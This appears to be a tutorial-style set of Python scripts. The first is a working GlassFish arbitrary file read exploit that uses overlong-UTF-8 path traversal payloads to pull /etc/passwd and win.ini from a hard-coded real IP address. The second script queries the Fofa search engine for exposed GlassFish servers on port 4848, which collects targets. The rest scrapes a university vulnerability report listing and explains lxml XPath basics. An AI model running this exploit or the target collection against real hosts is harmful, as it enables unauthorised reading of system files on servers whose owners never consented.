import requests
url = "http://217.27.153.138:4848/"
payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
payload_windows = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini"
data_linux = requests.get(url + payload_linux)      # fetch the response for the Linux payload
data_windows = requests.get(url + payload_windows)  # fetch the response for the Windows payload
print(data_linux.content.decode('utf-8'))
print(data_windows.content.decode('utf-8'))
statuscode_linux = data_linux.status_code      # status code returned by the Linux probe
statuscode_windows = data_windows.status_code  # status code returned by the Windows probe
if statuscode_linux == 200:
    print("The GlassFish arbitrary file read vulnerability exists (Linux)")
    print(data_linux.text)
elif statuscode_windows == 200:
    print("The GlassFish arbitrary file read vulnerability exists (Windows)")
    print(data_windows.text)
else:
    print("The GlassFish arbitrary file read vulnerability does not exist")
Python Development - Fofa Search Result Extraction and Collection Script
import base64
import requests
url = "https://fofa.info/result?qbase64="
search_data ='"glassfish" && port="4848"'
search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8")
urls=url+search_data_b64
print(search_data_b64)
print(urls)
result = requests.get(urls)  # request the Fofa search result page
print(result.content.decode('utf-8'))
Result:
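The script above only fetches and prints the raw HTML of the Fofa result page. Below is a minimal sketch of how that page could be parsed for target links with lxml; the generic //a/@href XPath and the assumption that results are visible without logging in are guesses, since Fofa's result markup (and its login/API requirements) are not shown here.

import base64
import requests
from lxml import etree

search_data = '"glassfish" && port="4848"'
qbase64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8")
page = requests.get("https://fofa.info/result?qbase64=" + qbase64).content

# Generic extraction: grab every absolute link on the page and de-duplicate.
# A real collector would target Fofa's actual result markup or use its API.
html = etree.HTML(page)
links = {href for href in html.xpath("//a/@href") if href.startswith("http")}
for link in sorted(links):
    print(link)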
Target: https://src.sjtu.edu.cn/
import requests, time
from lxml import etree
url = 'https://src.sjtu.edu.cn/list/?'
data = requests.get(url).content
soup=etree.HTML(data)
result = soup.xpath('//td/a/text()')
result = set(result)  # remove duplicates
results = '\n'.join(result)
resultss = results.split()
for edu in resultss:
    with open(r'src.txt', 'a+', encoding='utf-8') as f:
        f.write(edu + '\n')
Result:
One sample block from the fetched data:
<tr class="row">
    <td class="am-text-center am-hide-sm-down">2022-05-09</td>
    <td>
        <a href="/post/142243/">
            上海交通大学存在敏感信息泄露
        </a>
    </td>
    <td class="am-text-center am-hide-sm-down"><span class="am-badge am-badge-secondary">低危</span></td>
    <td class="am-text-center"><a href="/profile/12488/">
        blame哥求求你带带弟弟</a></td>
</tr>
The goal is to filter only the vulnerability titles out of the data, e.g. 上海交通大学存在敏感信息泄露.
Using result = soup.xpath('//td/a/text()') works, but it returns the text of every <a> child of every <td>, so the submitter names come back along with the report titles; a narrower XPath (see the sketch below) avoids this.
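Based on the sample row above, report titles sit in <a> tags whose href starts with /post/, while submitter names sit under /profile/ links, so the XPath can be narrowed with starts-with(). A sketch, assuming every row of the listing follows the same pattern:

import requests
from lxml import etree

data = requests.get('https://src.sjtu.edu.cn/list/?').content
soup = etree.HTML(data)

# Keep only links that point at a report page (/post/...), which skips the
# /profile/... submitter links sitting in the same table.
titles = soup.xpath('//td/a[starts-with(@href, "/post/")]/text()')
for title in set(titles):  # de-duplicate, as in the original script
    print(title.strip())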
text.html
<div>
    <ul>
        <li class="item-0"><a href="link1.html">第一个</a></li>
        <li class="item-1"><a href="link2.html">second item</a></li>
    </ul>
</div>
test.py
from lxml import etree
text = '''
<div>
    <ul>
        <li class="item-0"><a href="link1.html">第一个</a></li>
        <li class="item-1"><a href="link2.html">second item</a></li>
    </ul>
</div>
'''
html=etree.HTML(text,etree.HTMLParser())
result = html.xpath('//li[@class="item-0"]/a/text()')   # text directly under the a node
result1 = html.xpath('//li[@class="item-0"]//text()')   # text of all descendants of the li
print(result)
print(result1)
Result:
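For this snippet both expressions should print the same single-element list, because the only text inside the li with class item-0 is the text of its a child:
['第一个']
['第一个']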